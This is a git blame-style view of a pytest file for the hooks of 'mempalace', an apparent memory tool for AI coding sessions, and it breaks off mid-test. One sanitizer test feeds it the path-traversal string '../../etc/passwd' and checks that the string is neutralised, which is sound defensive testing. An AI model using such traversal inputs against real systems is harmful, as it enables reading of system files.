2026-04-08 20:40:03 +03:00
|
|
|
import contextlib
|
2026-04-08 20:54:41 +03:00
|
|
|
import io
|
2026-04-08 20:40:03 +03:00
|
|
|
import json
|
2026-04-18 20:27:56 -07:00
|
|
|
import os
|
2026-04-15 12:26:54 +05:00
|
|
|
import subprocess
|
2026-04-08 20:40:03 +03:00
|
|
|
from pathlib import Path
|
2026-04-21 13:20:52 -07:00
|
|
|
from unittest.mock import MagicMock, patch
|
2026-04-08 20:40:03 +03:00
|
|
|
|
2026-04-08 20:54:41 +03:00
|
|
|
import pytest
|
|
|
|
|
|
2026-04-08 20:40:03 +03:00
|
|
|
from mempalace.hooks_cli import (
|
|
|
|
|
SAVE_INTERVAL,
|
|
|
|
|
_count_human_messages,
|
2026-04-21 13:20:52 -07:00
|
|
|
_extract_recent_messages,
|
2026-04-15 12:26:54 +05:00
|
|
|
_get_mine_dir,
|
2026-04-08 20:54:41 +03:00
|
|
|
_log,
|
|
|
|
|
_maybe_auto_ingest,
|
2026-04-21 13:20:52 -07:00
|
|
|
_mempalace_python,
|
2026-04-18 20:27:56 -07:00
|
|
|
_mine_already_running,
|
2026-04-08 20:54:41 +03:00
|
|
|
_parse_harness_input,
|
2026-04-08 20:40:03 +03:00
|
|
|
_sanitize_session_id,
|
2026-04-13 14:10:04 -03:00
|
|
|
_validate_transcript_path,
|
2026-04-08 20:40:03 +03:00
|
|
|
hook_stop,
|
|
|
|
|
hook_session_start,
|
|
|
|
|
hook_precompact,
|
2026-04-08 20:54:41 +03:00
|
|
|
run_hook,
|
2026-04-08 20:40:03 +03:00
|
|
|
)
|
|
|
|
|
|
|
|
|
|
|
2026-04-21 13:20:52 -07:00
|
|
|
# --- _mempalace_python ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_mempalace_python_returns_string():
|
|
|
|
|
result = _mempalace_python()
|
|
|
|
|
assert isinstance(result, str)
|
|
|
|
|
assert "python" in result
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_mempalace_python_finds_venv():
|
|
|
|
|
"""Should resolve to a valid Python interpreter path."""
|
|
|
|
|
result = _mempalace_python()
|
|
|
|
|
assert result and "python" in os.path.basename(result).lower()
|
|
|
|
|
|
|
|
|
|
|
2026-04-08 20:40:03 +03:00
|
|
|
# --- _sanitize_session_id ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_sanitize_normal_id():
|
|
|
|
|
assert _sanitize_session_id("abc-123_XYZ") == "abc-123_XYZ"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_sanitize_strips_dangerous_chars():
|
|
|
|
|
assert _sanitize_session_id("../../etc/passwd") == "etcpasswd"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_sanitize_empty_returns_unknown():
|
|
|
|
|
assert _sanitize_session_id("") == "unknown"
|
|
|
|
|
assert _sanitize_session_id("!!!") == "unknown"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- _count_human_messages ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def _write_transcript(path: Path, entries: list[dict]):
|
|
|
|
|
with open(path, "w", encoding="utf-8") as f:
|
|
|
|
|
for entry in entries:
|
|
|
|
|
f.write(json.dumps(entry) + "\n")
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_human_messages_basic(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[
|
|
|
|
|
{"message": {"role": "user", "content": "hello"}},
|
|
|
|
|
{"message": {"role": "assistant", "content": "hi"}},
|
|
|
|
|
{"message": {"role": "user", "content": "bye"}},
|
|
|
|
|
],
|
|
|
|
|
)
|
2026-04-08 20:40:03 +03:00
|
|
|
assert _count_human_messages(str(transcript)) == 2
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_skips_command_messages(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[
|
|
|
|
|
{"message": {"role": "user", "content": "<command-message>status</command-message>"}},
|
|
|
|
|
{"message": {"role": "user", "content": "real question"}},
|
|
|
|
|
],
|
|
|
|
|
)
|
2026-04-08 20:40:03 +03:00
|
|
|
assert _count_human_messages(str(transcript)) == 1
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_handles_list_content(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[
|
|
|
|
|
{"message": {"role": "user", "content": [{"type": "text", "text": "hello"}]}},
|
|
|
|
|
{
|
|
|
|
|
"message": {
|
|
|
|
|
"role": "user",
|
|
|
|
|
"content": [{"type": "text", "text": "<command-message>x</command-message>"}],
|
|
|
|
|
}
|
|
|
|
|
},
|
|
|
|
|
],
|
|
|
|
|
)
|
2026-04-08 20:40:03 +03:00
|
|
|
assert _count_human_messages(str(transcript)) == 1
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_missing_file():
|
|
|
|
|
assert _count_human_messages("/nonexistent/path.jsonl") == 0
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_empty_file(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
transcript.write_text("")
|
|
|
|
|
assert _count_human_messages(str(transcript)) == 0
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_malformed_json_lines(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
transcript.write_text('not json\n{"message": {"role": "user", "content": "ok"}}\n')
|
|
|
|
|
assert _count_human_messages(str(transcript)) == 1
|
|
|
|
|
|
|
|
|
|
|
2026-04-21 13:20:52 -07:00
|
|
|
# --- _extract_recent_messages ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_extract_recent_messages_basic(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(5)],
|
|
|
|
|
)
|
|
|
|
|
msgs = _extract_recent_messages(str(transcript), count=3)
|
|
|
|
|
assert len(msgs) == 3
|
|
|
|
|
assert msgs[0] == "msg 2"
|
|
|
|
|
assert msgs[2] == "msg 4"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_extract_recent_messages_skips_commands(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[
|
|
|
|
|
{"message": {"role": "user", "content": "real msg"}},
|
|
|
|
|
{"message": {"role": "user", "content": "<command-message>status</command-message>"}},
|
|
|
|
|
{"message": {"role": "user", "content": "<system-reminder>hook</system-reminder>"}},
|
|
|
|
|
],
|
|
|
|
|
)
|
|
|
|
|
msgs = _extract_recent_messages(str(transcript))
|
|
|
|
|
assert len(msgs) == 1
|
|
|
|
|
assert msgs[0] == "real msg"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_extract_recent_messages_missing_file():
|
|
|
|
|
assert _extract_recent_messages("/nonexistent.jsonl") == []
|
|
|
|
|
|
|
|
|
|
|
2026-04-08 20:40:03 +03:00
|
|
|
# --- hook_stop ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def _capture_hook_output(hook_fn, data, harness="claude-code", state_dir=None):
|
|
|
|
|
"""Run a hook and capture its JSON stdout output."""
|
|
|
|
|
import io
|
2026-04-21 13:20:52 -07:00
|
|
|
from unittest.mock import PropertyMock
|
2026-04-08 21:08:49 +03:00
|
|
|
|
2026-04-08 20:40:03 +03:00
|
|
|
buf = io.StringIO()
|
|
|
|
|
patches = [patch("mempalace.hooks_cli._output", side_effect=lambda d: buf.write(json.dumps(d)))]
|
|
|
|
|
if state_dir:
|
|
|
|
|
patches.append(patch("mempalace.hooks_cli.STATE_DIR", state_dir))
|
2026-04-21 13:20:52 -07:00
|
|
|
# Mock MempalaceConfig so tests don't depend on user's ~/.mempalace/config.json
|
|
|
|
|
mock_config = MagicMock()
|
|
|
|
|
type(mock_config).hook_silent_save = PropertyMock(return_value=True)
|
|
|
|
|
type(mock_config).hook_desktop_toast = PropertyMock(return_value=False)
|
|
|
|
|
patches.append(patch("mempalace.config.MempalaceConfig", return_value=mock_config))
|
2026-04-08 20:40:03 +03:00
|
|
|
with contextlib.ExitStack() as stack:
|
|
|
|
|
for p in patches:
|
|
|
|
|
stack.enter_context(p)
|
|
|
|
|
hook_fn(data, harness)
|
|
|
|
|
return json.loads(buf.getvalue())
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_stop_hook_passthrough_when_active(tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{"session_id": "test", "stop_hook_active": True, "transcript_path": ""},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert result == {}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_stop_hook_passthrough_when_active_string(tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{"session_id": "test", "stop_hook_active": "true", "transcript_path": ""},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert result == {}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_stop_hook_passthrough_below_interval(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL - 1)],
|
|
|
|
|
)
|
2026-04-08 20:40:03 +03:00
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert result == {}
|
|
|
|
|
|
|
|
|
|
|
2026-04-21 13:20:52 -07:00
|
|
|
def test_stop_hook_saves_silently_at_interval(tmp_path):
|
2026-04-08 20:40:03 +03:00
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
|
|
|
|
|
)
|
2026-04-21 13:20:52 -07:00
|
|
|
save_result = {"count": 15, "themes": ["hooks", "notifications"]}
|
|
|
|
|
with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result) as mock_save:
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
# Saves silently — systemMessage notification with themes, no block
|
|
|
|
|
assert result["systemMessage"].startswith("\u2726 15 memories woven into the palace")
|
|
|
|
|
assert "hooks" in result["systemMessage"]
|
|
|
|
|
mock_save.assert_called_once_with(str(transcript), "test", toast=False)
|
2026-04-08 20:40:03 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_stop_hook_tracks_save_point(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
|
|
|
|
|
)
|
2026-04-08 20:40:03 +03:00
|
|
|
data = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)}
|
|
|
|
|
|
2026-04-21 13:20:52 -07:00
|
|
|
# First call saves silently with systemMessage notification
|
|
|
|
|
save_result = {"count": 15, "themes": ["hooks"]}
|
|
|
|
|
with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
|
|
|
|
|
result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
|
|
|
|
|
assert "systemMessage" in result
|
2026-04-08 20:40:03 +03:00
|
|
|
|
|
|
|
|
# Second call with same count passes through (already saved)
|
2026-04-21 13:20:52 -07:00
|
|
|
with patch("mempalace.hooks_cli._save_diary_direct") as mock_save:
|
|
|
|
|
result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
|
2026-04-08 20:40:03 +03:00
|
|
|
assert result == {}
|
2026-04-21 13:20:52 -07:00
|
|
|
mock_save.assert_not_called()
|
2026-04-08 20:40:03 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- hook_session_start ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_session_start_passes_through(tmp_path):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_session_start,
|
|
|
|
|
{"session_id": "test"},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert result == {}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- hook_precompact ---
|
|
|
|
|
|
|
|
|
|
|
2026-04-15 12:26:54 +05:00
|
|
|
def test_precompact_allows(tmp_path):
|
2026-04-08 20:40:03 +03:00
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_precompact,
|
|
|
|
|
{"session_id": "test"},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
2026-04-15 12:26:54 +05:00
|
|
|
assert result == {}
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- _log ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_log_writes_to_hook_log(tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
_log("test message")
|
|
|
|
|
log_path = tmp_path / "hook.log"
|
|
|
|
|
assert log_path.is_file()
|
|
|
|
|
content = log_path.read_text()
|
|
|
|
|
assert "test message" in content
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_log_oserror_is_silenced(tmp_path):
|
|
|
|
|
"""_log should not raise if the directory cannot be created."""
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", Path("/nonexistent/deeply/nested/dir")):
|
|
|
|
|
# Should not raise
|
|
|
|
|
_log("this will fail silently")
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- _maybe_auto_ingest ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_maybe_auto_ingest_no_env(tmp_path):
|
2026-04-15 12:26:54 +05:00
|
|
|
"""Without MEMPAL_DIR or transcript_path, does nothing."""
|
2026-04-08 20:54:41 +03:00
|
|
|
with patch.dict("os.environ", {}, clear=True):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
_maybe_auto_ingest() # should not raise
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_maybe_auto_ingest_with_env(tmp_path):
|
|
|
|
|
"""With MEMPAL_DIR set to a valid directory, spawns subprocess."""
|
|
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
2026-04-18 20:27:56 -07:00
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", tmp_path / "mine.pid"):
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.Popen") as mock_popen:
|
|
|
|
|
_maybe_auto_ingest()
|
|
|
|
|
mock_popen.assert_called_once()
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
2026-04-15 12:26:54 +05:00
|
|
|
def test_maybe_auto_ingest_with_transcript(tmp_path):
|
|
|
|
|
"""Falls back to transcript directory when MEMPAL_DIR is not set."""
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
transcript.write_text("")
|
|
|
|
|
with patch.dict("os.environ", {}, clear=True):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
2026-04-18 20:27:56 -07:00
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", tmp_path / "mine.pid"):
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.Popen") as mock_popen:
|
|
|
|
|
_maybe_auto_ingest(str(transcript))
|
|
|
|
|
mock_popen.assert_called_once()
|
2026-04-15 12:26:54 +05:00
|
|
|
|
|
|
|
|
|
2026-04-08 20:54:41 +03:00
|
|
|
def test_maybe_auto_ingest_oserror(tmp_path):
|
|
|
|
|
"""OSError during subprocess spawn is silenced."""
|
|
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
2026-04-18 20:27:56 -07:00
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", tmp_path / "mine.pid"):
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.Popen", side_effect=OSError("fail")):
|
|
|
|
|
_maybe_auto_ingest() # should not raise
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_maybe_auto_ingest_skips_when_mine_running(tmp_path):
|
|
|
|
|
"""Does not spawn a new mine process if one is already running."""
|
|
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli._mine_already_running", return_value=True):
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.Popen") as mock_popen:
|
|
|
|
|
_maybe_auto_ingest()
|
|
|
|
|
mock_popen.assert_not_called()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- _mine_already_running ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_mine_already_running_no_file(tmp_path):
|
|
|
|
|
"""Returns False when no PID file exists."""
|
|
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", tmp_path / "mine.pid"):
|
|
|
|
|
assert _mine_already_running() is False
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_mine_already_running_dead_pid(tmp_path):
|
|
|
|
|
"""Returns False when PID file contains a PID that no longer exists."""
|
|
|
|
|
pid_file = tmp_path / "mine.pid"
|
|
|
|
|
pid_file.write_text("999999999") # almost certainly not a real PID
|
|
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", pid_file):
|
|
|
|
|
assert _mine_already_running() is False
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_mine_already_running_live_pid(tmp_path):
|
|
|
|
|
"""Returns True when PID file contains the current process's own PID."""
|
|
|
|
|
pid_file = tmp_path / "mine.pid"
|
|
|
|
|
pid_file.write_text(str(os.getpid())) # current process is definitely alive
|
|
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", pid_file):
|
|
|
|
|
assert _mine_already_running() is True
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_mine_already_running_corrupt_file(tmp_path):
|
|
|
|
|
"""Returns False when PID file contains non-integer content."""
|
|
|
|
|
pid_file = tmp_path / "mine.pid"
|
|
|
|
|
pid_file.write_text("not-a-pid")
|
|
|
|
|
with patch("mempalace.hooks_cli._MINE_PID_FILE", pid_file):
|
|
|
|
|
assert _mine_already_running() is False
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
2026-04-15 12:26:54 +05:00
|
|
|
# --- _get_mine_dir ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_get_mine_dir_mempal_dir(tmp_path):
|
|
|
|
|
"""MEMPAL_DIR takes priority over transcript_path."""
|
|
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
transcript.write_text("")
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
assert _get_mine_dir(str(transcript)) == str(mempal_dir)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_get_mine_dir_transcript_fallback(tmp_path):
|
|
|
|
|
"""Falls back to transcript parent dir when MEMPAL_DIR is not set."""
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
transcript.write_text("")
|
|
|
|
|
with patch.dict("os.environ", {}, clear=True):
|
|
|
|
|
assert _get_mine_dir(str(transcript)) == str(tmp_path)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_get_mine_dir_empty():
|
|
|
|
|
"""Returns empty string when nothing is available."""
|
|
|
|
|
with patch.dict("os.environ", {}, clear=True):
|
|
|
|
|
assert _get_mine_dir("") == ""
|
|
|
|
|
|
|
|
|
|
|
2026-04-08 20:54:41 +03:00
|
|
|
# --- _parse_harness_input ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_parse_harness_input_unknown():
|
|
|
|
|
"""Unknown harness should sys.exit(1)."""
|
|
|
|
|
with pytest.raises(SystemExit) as exc_info:
|
|
|
|
|
_parse_harness_input({"session_id": "test"}, "unknown-harness")
|
|
|
|
|
assert exc_info.value.code == 1
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_parse_harness_input_valid():
|
|
|
|
|
result = _parse_harness_input(
|
|
|
|
|
{"session_id": "abc-123", "stop_hook_active": True, "transcript_path": "/tmp/t.jsonl"},
|
|
|
|
|
"claude-code",
|
|
|
|
|
)
|
|
|
|
|
assert result["session_id"] == "abc-123"
|
|
|
|
|
assert result["stop_hook_active"] is True
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- hook_stop with OSError on write ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_stop_hook_oserror_on_last_save_read(tmp_path):
|
|
|
|
|
"""When last_save_file has invalid content, falls back to 0."""
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
|
|
|
|
|
)
|
2026-04-08 20:54:41 +03:00
|
|
|
# Write invalid content to last save file
|
|
|
|
|
(tmp_path / "test_last_save").write_text("not_a_number")
|
2026-04-21 13:20:52 -07:00
|
|
|
save_result = {"count": 15, "themes": ["testing"]}
|
|
|
|
|
with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert "systemMessage" in result
|
|
|
|
|
assert "15 memories" in result["systemMessage"]
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_stop_hook_oserror_on_write(tmp_path):
|
|
|
|
|
"""When write to last_save_file fails, hook still outputs correctly."""
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
|
|
|
|
|
)
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
def bad_write_text(*args, **kwargs):
|
|
|
|
|
raise OSError("disk full")
|
|
|
|
|
|
2026-04-21 13:20:52 -07:00
|
|
|
save_result = {"count": 15, "themes": []}
|
2026-04-08 20:54:41 +03:00
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
2026-04-21 13:20:52 -07:00
|
|
|
with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
|
|
|
|
|
with patch.object(Path, "write_text", bad_write_text):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{
|
|
|
|
|
"session_id": "test",
|
|
|
|
|
"stop_hook_active": False,
|
|
|
|
|
"transcript_path": str(transcript),
|
|
|
|
|
},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert "systemMessage" in result
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- hook_precompact with MEMPAL_DIR ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_precompact_with_mempal_dir(tmp_path):
|
2026-04-15 12:26:54 +05:00
|
|
|
"""Precompact runs subprocess.run (sync) when MEMPAL_DIR is set."""
|
2026-04-08 20:54:41 +03:00
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.run") as mock_run:
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_precompact,
|
|
|
|
|
{"session_id": "test"},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
2026-04-15 12:26:54 +05:00
|
|
|
assert result == {}
|
2026-04-08 20:54:41 +03:00
|
|
|
mock_run.assert_called_once()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_precompact_with_mempal_dir_oserror(tmp_path):
|
|
|
|
|
"""Precompact handles OSError from subprocess gracefully."""
|
|
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.run", side_effect=OSError("fail")):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_precompact,
|
|
|
|
|
{"session_id": "test"},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
2026-04-15 12:26:54 +05:00
|
|
|
assert result == {}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_precompact_with_timeout(tmp_path):
|
|
|
|
|
"""Precompact handles TimeoutExpired gracefully -- still allows."""
|
|
|
|
|
mempal_dir = tmp_path / "project"
|
|
|
|
|
mempal_dir.mkdir()
|
|
|
|
|
with patch.dict("os.environ", {"MEMPAL_DIR": str(mempal_dir)}):
|
|
|
|
|
with patch(
|
|
|
|
|
"mempalace.hooks_cli.subprocess.run",
|
|
|
|
|
side_effect=subprocess.TimeoutExpired(cmd="mine", timeout=60),
|
|
|
|
|
):
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_precompact, {"session_id": "test"}, state_dir=tmp_path
|
|
|
|
|
)
|
|
|
|
|
assert result == {}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_precompact_mines_transcript_dir(tmp_path, monkeypatch):
|
|
|
|
|
"""Precompact mines transcript directory when no MEMPAL_DIR."""
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
transcript.write_text("")
|
|
|
|
|
monkeypatch.delenv("MEMPAL_DIR", raising=False)
|
|
|
|
|
with patch("mempalace.hooks_cli.subprocess.run") as mock_run:
|
|
|
|
|
result = _capture_hook_output(
|
|
|
|
|
hook_precompact,
|
|
|
|
|
{"session_id": "test", "transcript_path": str(transcript)},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
assert result == {}
|
|
|
|
|
mock_run.assert_called_once()
|
|
|
|
|
# Verify mine dir is the transcript's parent
|
|
|
|
|
call_args = mock_run.call_args[0][0]
|
|
|
|
|
assert str(tmp_path) in call_args[-1]
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- run_hook ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_run_hook_dispatches_session_start(tmp_path):
|
|
|
|
|
"""run_hook reads stdin JSON and dispatches to correct handler."""
|
|
|
|
|
stdin_data = json.dumps({"session_id": "run-test"})
|
|
|
|
|
with patch("sys.stdin", io.StringIO(stdin_data)):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli._output") as mock_output:
|
|
|
|
|
run_hook("session-start", "claude-code")
|
|
|
|
|
mock_output.assert_called_once_with({})
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_run_hook_dispatches_stop(tmp_path):
|
|
|
|
|
transcript = tmp_path / "t.jsonl"
|
2026-04-08 21:08:49 +03:00
|
|
|
_write_transcript(
|
|
|
|
|
transcript, [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(3)]
|
|
|
|
|
)
|
|
|
|
|
stdin_data = json.dumps(
|
|
|
|
|
{
|
|
|
|
|
"session_id": "run-test",
|
|
|
|
|
"stop_hook_active": False,
|
|
|
|
|
"transcript_path": str(transcript),
|
|
|
|
|
}
|
|
|
|
|
)
|
2026-04-08 20:54:41 +03:00
|
|
|
with patch("sys.stdin", io.StringIO(stdin_data)):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
